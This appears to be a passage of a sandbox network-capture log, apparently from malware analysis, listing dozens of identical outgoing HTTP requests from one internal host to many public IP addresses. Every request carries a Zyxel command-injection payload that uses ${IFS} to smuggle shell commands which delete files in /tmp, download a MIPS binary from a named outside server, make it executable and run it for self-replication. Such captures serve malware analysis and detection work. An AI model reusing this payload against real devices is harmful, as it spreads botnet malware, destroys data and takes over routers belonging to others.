                                        Mar 31, 2024 09:21:04.676419020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3534192.168.2.2354178216.86.253.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.676465034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3535192.168.2.2354752115.150.38.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.676515102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3536192.168.2.23455564.75.174.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.676563978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3537192.168.2.2339376151.14.112.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.676605940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3538192.168.2.234905263.64.96.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.676681042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3539192.168.2.2337612138.20.121.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.676714897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3540192.168.2.2349414200.66.141.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.676760912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3541192.168.2.2341770208.88.189.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.676805019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3542192.168.2.235899636.214.126.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.676868916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3543192.168.2.2358468118.89.57.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.676942110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3544192.168.2.2333990160.191.242.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.676975965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3545192.168.2.234649284.88.200.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.677040100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3546192.168.2.2337674181.157.111.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.677104950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3547192.168.2.2343308165.161.237.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.677165031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3548192.168.2.236047443.224.231.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.677232981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3549192.168.2.235775234.224.96.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.677279949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3550192.168.2.2347684206.58.97.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.677344084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3551192.168.2.2350226221.86.48.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.677419901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3552192.168.2.235172854.2.9.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.677459955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3553192.168.2.2335758211.219.104.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.677536011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3554192.168.2.2346514204.87.5.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.677597046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3555192.168.2.234955868.138.206.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.677644968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3556192.168.2.235093865.225.184.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.677704096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3557192.168.2.2343410104.115.49.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.677759886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3558192.168.2.233428420.202.136.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.677800894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3559192.168.2.234576036.201.207.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.677850008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3560192.168.2.2343226164.40.120.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.677925110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3561192.168.2.2355708168.79.3.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.677982092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3562192.168.2.2334142141.127.149.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.678061008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3563192.168.2.2337844170.64.53.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.678112984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3564192.168.2.2346136130.102.161.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.678169966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3565192.168.2.2342166206.63.169.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.678224087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3566192.168.2.2346734176.176.228.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.678265095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3567192.168.2.2353866211.78.17.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.678339958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3568192.168.2.2360004109.248.0.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.678388119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3569192.168.2.233590294.126.27.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.678435087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3570192.168.2.235297281.113.25.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.678489923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3571192.168.2.2344682169.130.164.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.678584099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3572192.168.2.2358034100.178.83.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.678630114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3573192.168.2.235384057.219.210.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.678685904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3574192.168.2.2358992223.141.18.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.678771973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3575192.168.2.233423447.143.182.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.678828001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3576192.168.2.2338970187.38.110.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.678895950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3577192.168.2.2355026150.254.27.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.678950071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3578192.168.2.2354996141.207.196.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.679042101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3579192.168.2.234622420.170.253.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.679085016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3580192.168.2.2346452166.19.184.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.679128885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3581192.168.2.2347356195.19.119.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.679171085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3582192.168.2.2358776136.61.230.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.679228067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3583192.168.2.2337346195.0.127.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.679291010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3584192.168.2.234196275.22.156.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.679366112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3585192.168.2.2357980187.211.13.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.679434061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3586192.168.2.2355034125.123.33.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.679478884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3587192.168.2.2344086160.212.176.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.679532051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3588192.168.2.234077482.133.155.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.679584026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3589192.168.2.2357272194.240.73.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.679668903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3590192.168.2.2359148129.132.28.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.679702997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3591192.168.2.235075686.8.213.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.679744005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3592192.168.2.235602093.18.22.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.679826021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3593192.168.2.235588640.91.123.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.679874897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3594192.168.2.234302442.152.76.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.679935932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3595192.168.2.2348568209.169.11.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.679972887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3596192.168.2.2335800115.199.74.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.680018902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3597192.168.2.2337530197.108.19.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.680062056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3598192.168.2.235419696.243.34.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.680133104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3599192.168.2.2359044100.21.226.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.680183887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3600192.168.2.234797678.0.125.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.680238008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3601192.168.2.2356558133.220.179.237443
                                        TimestampBytes transferredDirectionData
